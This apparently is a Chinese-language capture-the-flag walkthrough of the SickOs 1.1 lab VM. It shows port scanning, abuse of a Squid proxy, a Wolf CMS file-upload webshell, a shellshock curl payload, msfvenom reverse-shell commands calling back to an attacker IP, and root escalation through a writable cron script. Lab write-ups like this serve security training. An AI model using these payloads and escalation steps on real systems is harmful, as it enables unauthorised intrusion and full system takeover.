当前位置: 首页 > article >正文

Sock0s1.1

article 2024/11/20 17:34:09

信息收集

探测存活主机

发现存活主机为192.168.217.133

探测开放端口

nmap -sT -p- 192.168.217.133 -oA ./ports

发现两个端口开放,分别是22 3128,同时探测到了8080端口,但是显示是关闭的状态。

UDP端口探测

nmap -sU --top-ports 20 192.168.217.133 -oA ./ports

版本服务信息探测

nmap -sT -sV -sC -O -p22,3128,8080 192.168.217.133 -oA ./details

漏洞脚本探测

nmap -sT --script=vuln 192.168.217.133 -oA ./vuln

渗透测试

尝试访问192.168.217.133:

访问不到,由于上面信息收集到3128端口开放的服务是squid-http,不知道这是什么东西,百度下:

发现这是一个代理服务器,因此我们尝试利用这个代理去访问一下192.168.217.133地址!

我们尝试利用代理进行访问,成功能访问到目标靶机上的页面。

目录扫描

进行目录扫描的时候需要使用3128的代理:

发现robots.txt文件,尝试访问这个文件:

发现wolfcms,尝试访问这个目录:(确实存在一套内容管理系统!)

现在怎么办?不妨找一下这个系统公开漏洞尝试利用一下:

发现了这套系统存在后台的任意文件上传漏洞,后台的登陆地址为:ip/?/admin/login

确实存在相关的后台登陆地址,接下来我们先尝试弱口令进行登录:(admin/123456 失败! admin/admin成功!)

登陆成功上来发现了wolf cms 的版本为0.8.2,该版本存在任意文件上传漏洞!

编写木马的内容:(直接php一句话木马

利用蚁剑连接webshell:

当然了蚁剑是需要挂代理的!

权限是www-data权限,需要进行权限提升!

还有一种方法就是我们能够修改他的代码,尝试在articles中,添加反弹shell的代码:

之所以端口是443,是因为对方的机器可能是不出网的!

攻击机起一个监听:

当我们点击articles的时候,便会收到一个shell!

查看网站目录下的config.php文件:

发现了一个数据库的账号和密码!

查看用户信息:

cat /etc/passwd

发现了几个账号:root、最后面有一个sickos用户。尝试利用ssh进行登录:

提权

成功登录!查看权限:

sudo -l

具有全部的权限,看到三个ALL,也就证明我们几乎是拿到了最高权限!

sudo /bin/bash

切换到root的家目录:

另一种方式

这个看到红队笔记的打法:(利用nikto进行扫描)

nikto -h 192.168.217.133 -useproxy=http://192.168.217.133:3128/

经过扫描,发现存在shellshock漏洞。

shellshock简介

shellshock即unix 系统下的bash shell的一个漏洞,Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统。

判断是否真的存在shellshock漏洞

利用curl进行判断:

curl -v --proxy http://192.168.217.133:3128/ http://192.168.217.133/cgi-bin/status -H "Referer:() { test;}; echo 'Content-type: text/plain'; echo; echo; /usr/bin/id;exit"

利用msfvenom生成木马代码:

msfvenom -p cmd/unix/reverse_bash lhost=192.168.217.128 lport=443 -f raw

然后粘贴到curl中进行执行:

成功获取到反弹shell!

查看操作系统的相关信息:

uname -a
dpkg -l //查看操作系统都安装了哪些软件

发现安装了python,所以我们尝试利用python去开启一个交互性好的bash

python -c "import pty;pty.spawn('/bin/bash')"

之后我们尝试看一下网站的目录下存在什么东西,一般来说网站都在/var/www目录下:

有一个connect.py文件,看一下:

大概说是 我尝试非常规律的连接一些事情,你或许想要试试我的服务???

计划任务? 服务?

上述文件是/etc/crontab的结果!再看看cron.d:

发现了之前我们看到的那个connect文件的定时任务,大概就是每一分钟以root身份执行一下connect这个文件,因此我们可以在connect文件中写入代码,那么经过一分钟之后便会得到执行结果!

利用msfvenom生成一个反弹shell的代码:

msfvenom -p cmd/unix/reverse_python lhost=192.168.217.128 lport=444 -f raw

生成的代码如上,我们只需要将他放到connect.py文件中即可!

之后我们在攻击机上起一个监听!等一分钟后便会得到一个root的shell:

之后我们直接读取root家目录下的文件即可:


http://www.kler.cn/a/153892.html

相关文章:

  • 网络安全领域的最新动态和漏洞信息
  • 面向服务的软件工程——巨详细讲解商务流程建模符号 (BPMN),一篇章带你入门BPMN!!!(week1)
  • 探索Python PDF处理的奥秘:pdfrw库揭秘
  • 【WPF】Prism学习(七)
  • ssh无法连接Ubuntu
  • 【计算机网络安全】湖北大学-mysql事务隔离性实验
  • ssh连接docker容器处理备忘
  • python处理日期和时间
  • C++模版
  • android开发:获取手机IP和UDP广播
  • 支持Upsert、Kafka Connector、集成Airbyte,Milvus助力高效数据流处理
  • 3D建模基础教程:常用修改器讲解:FFD、壳、法线、uvw展开等
  • 「Verilog学习笔记」整数倍数据位宽转换8to16
  • 抽奖送平板是骗局!!!
  • 百度智能云文字识别使用问题解决合集
  • Tlog SpringBoot3.x版本无法正常打印TraceId等数据
  • Elasticsearch:么是向量嵌入?
  • 初探webpack之单应用多端构建
  • 字节测试开发工程师一面面经分享
  • typescript泛型的基本使用
  • 多个模版结构特征提取
  • java设计模式学习之【原型模式】
  • 简谈oracle数据库的归档模式
  • 常用sql记录
  • 判断一个字符序列是否为回文————利用使用双指针法
  • 从零开始搭建博客网站-----登陆页面